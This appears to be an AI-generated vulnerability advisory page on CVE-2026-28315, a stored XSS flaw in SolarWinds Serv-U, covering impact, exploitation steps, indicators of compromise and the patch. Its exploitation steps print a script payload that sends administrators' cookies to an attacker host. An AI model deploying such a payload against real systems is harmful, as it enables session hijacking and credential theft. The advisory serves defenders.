CVE-2026-28315
Serv-U Managed File Transfer Server vulnerability analysis and mitigation

Overview

CVE-2026-28315 is a stored cross-site scripting (XSS) vulnerability in SolarWinds Serv-U Managed File Transfer that could lead to session hijacking or information disclosure from an administrator account. It affects SolarWinds Serv-U versions 15.5.4 HF1 and below, and was publicly disclosed on July 21, 2026. The vulnerability carries a CVSS v3.1 base score of 6.2 (Medium) (SolarWinds Advisory, GitHub Advisory).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically a stored XSS variant. An attacker with high-privilege (administrator-level) network access can inject malicious scripts into Serv-U that are persistently stored and later executed in the browser context of another administrator who views the affected content. Exploitation requires user interaction — specifically, an administrator must be tricked into clicking a malicious link or visiting a page containing the injected payload. The scope is changed, meaning the injected script can affect resources beyond the vulnerable component itself (SolarWinds Advisory, GitHub Advisory).

Impact

Successful exploitation of this vulnerability can result in session hijacking or sensitive information disclosure from an administrator account. Because the XSS payload is stored server-side and executes in the context of an authenticated administrator's browser session, an attacker could steal session tokens, capture credentials, or perform unauthorized administrative actions on the Serv-U instance. Integrity and availability impacts are rated as none; the primary risk is high confidentiality impact within the changed scope (SolarWinds Advisory, GitHub Advisory).

Exploitability

As of the disclosure date, there is no public proof-of-concept exploit and no evidence of active in-the-wild exploitation (SolarWinds Advisory). The NVD SSVC assessment confirms exploitation is currently rated as "none." The EPSS score is approximately 0.283%, placing it in the 21st percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for high privileges and user interaction, limiting the attack surface (GitHub Advisory).

Exploitation steps

  1. Gain high-privilege access: Obtain or compromise an account with administrator-level access to the SolarWinds Serv-U management interface on a vulnerable version (15.5.4 HF1 or below).
  2. Identify injectable input field: Locate a Serv-U management console field that is stored and later rendered to other administrators without proper output encoding (e.g., user profile fields, configuration names, or notification settings).
  3. Inject malicious XSS payload: Submit a crafted payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie;</script> into the vulnerable stored field.
  4. Wait for administrator interaction: The payload is stored server-side and executes when a target administrator views the affected page or clicks a link leading to it.
  5. Harvest session data: The executed script exfiltrates the administrator's session cookie or other sensitive information to an attacker-controlled server, enabling session hijacking or further unauthorized access (SolarWinds Advisory, GitHub Advisory).

Indicators of compromise

  • Network: Unexpected outbound HTTP/HTTPS requests from the Serv-U server or administrator browsers to unknown external domains shortly after an administrator accesses the management console; unusual GET requests with cookie or session data in query parameters to external hosts.
  • Logs: Serv-U access logs showing submission of input fields containing HTML/JavaScript tags (e.g., <script>, onerror=, javascript:) by a high-privilege account; repeated access to specific management console pages by different administrator accounts in a short timeframe.
  • File System: No specific file artifacts expected for a stored XSS attack, but review Serv-U configuration or database storage for unexpected script content in user-editable fields.
  • Process/Session: Unexpected administrator session activity (e.g., configuration changes, account creation) that does not correlate with known administrator actions, potentially indicating session hijacking following XSS exploitation.

Mitigation and workarounds

SolarWinds has released a fix in Serv-U version 2026.3, which addresses CVE-2026-28315 along with 14 other CVEs patched in the same release. Organizations running Serv-U 15.5.4 HF1 or below should upgrade to version 2026.3 immediately. No specific configuration-based workaround has been published; upgrading is the recommended and only confirmed remediation. Administrators should also train staff to avoid clicking suspicious links and review Content Security Policy (CSP) hardening improvements included in the 2026.3 release (SolarWinds Advisory, Serv-U Release Notes).

Community reactions

The July 21, 2026 Serv-U 2026.3 release attracted significant media attention primarily due to the 15 CVEs patched simultaneously, including 14 rated Critical (9.1). Coverage from GBHackers, CyberPress, Heise, and CyberSecurityNews highlighted the broader batch of critical IDOR and privilege escalation vulnerabilities rather than CVE-2026-28315 specifically, which was noted as the only Medium-severity issue in the release (GBHackers, Heise, CyberSecurityNews). No specific researcher commentary or threat actor attribution has been identified for this individual CVE.

Additional resources


SourceThis report was generated using AI

Related Serv-U Managed File Transfer Server vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-28321CRITICAL9.1
  • Serv-U Managed File Transfer Server logoServ-U Managed File Transfer Server
  • cpe:2.3:a:solarwinds:serv-u
NoYesJul 21, 2026
CVE-2026-28317CRITICAL9.1
  • Serv-U Managed File Transfer Server logoServ-U Managed File Transfer Server
  • cpe:2.3:a:solarwinds:serv-u
NoYesJul 21, 2026
CVE-2026-28316CRITICAL9.1
  • Serv-U Managed File Transfer Server logoServ-U Managed File Transfer Server
  • cpe:2.3:a:solarwinds:serv-u
NoYesJul 21, 2026
CVE-2026-28314CRITICAL9.1
  • Serv-U Managed File Transfer Server logoServ-U Managed File Transfer Server
  • cpe:2.3:a:solarwinds:serv-u
NoYesJul 21, 2026
CVE-2026-28315MEDIUM6.2
  • Serv-U Managed File Transfer Server logoServ-U Managed File Transfer Server
  • cpe:2.3:a:solarwinds:serv-u
NoYesJul 21, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management